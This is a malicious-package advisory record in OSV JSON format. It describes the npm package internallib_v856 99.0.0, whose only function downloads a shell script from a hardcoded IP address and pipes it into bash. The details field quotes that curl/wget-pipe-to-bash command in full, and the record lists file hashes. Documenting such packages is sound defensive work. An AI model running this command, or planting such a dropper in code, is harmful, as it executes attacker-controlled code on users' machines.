{"id":"MAL-2026-5694","summary":"Malicious code in internallib_v856 (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (d94a6872645a3d5b938f9bc48871dbdff18068bd32d04169c3e421cd6830934a)\nThe package's main entry (index.js) exports a single function `command()` that invokes `/bin/bash -c \"curl -s http://10.0.0.145:8080/shell.sh | bash || wget -qO- http://10.0.0.145:8080/shell.sh | bash\"`, fetching an unauthenticated shell script over plain HTTP from a hardcoded bare-IP endpoint and piping it directly into bash. Any consumer that requires this package and calls the advertised API will execute attacker-controlled code on their machine. The package metadata is a generic placeholder (`name: internallib_v856`, description `Internal lib for testing`, no author, no repository), and the package's only advertised function is the dropper itself — there is no legitimate functionality. Network destination http://10.0.0.145:8080/shell.sh is mutable, attacker-controlled, and unverifiable.\n","modified":"2026-06-12T16:46:41.927839711Z","published":"2026-06-12T15:28:22Z","database_specific":{"malicious-packages-origins":[{"sha256":"d94a6872645a3d5b938f9bc48871dbdff18068bd32d04169c3e421cd6830934a","import_time":"2026-06-12T16:32:16.436781596Z","source":"amazon-inspector","id":"IN-MAL-2026-005788","versions":["99.0.0"],"modified_time":"2026-06-12T15:28:22Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v856/v/99.0.0"}],"affected":[{"package":{"name":"internallib_v856","ecosystem":"npm","purl":"pkg:npm/internallib_v856"},"versions":["99.0.0"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/internallib_v856/MAL-2026-5694.json","cwes":[{"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."}],"indicators":{"evidence_files":[{"sha256":"cf43855c54b0e8af2eb86b9fcb23e09e60d9993c38e99848b313c5cac0328ecd","tlsh":"8bf09e4a04ea203d6ba63474ee9a7c26306749125138c551ba8fc1261f8440852ba7dc","path":"index.js"},{"tlsh":"01c04cb15516582324d543a45ca1890966664e2b5006a5095b672a0d40ea9b759b9b0c","sha256":"5d850d9a3b56882cc7172b51fad29ed24d3eebb822f385b9f79861007b66521a","path":"package.json"}],"package_integrity":[{"hashes":{"sha512_sri":"sha512-4XGG32TJnnUYjVwUMgjKmCpVJLOGrkMhh4/mI+rspVP32nDRrUp6JR/FJzkV4o9xqJEudmlaOrF6QCUCfGwR2g==","sha1":"835ca042490b9c353d6289db2ec942584671d508"},"filename":"internallib_v856-99.0.0.tgz"}]}}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}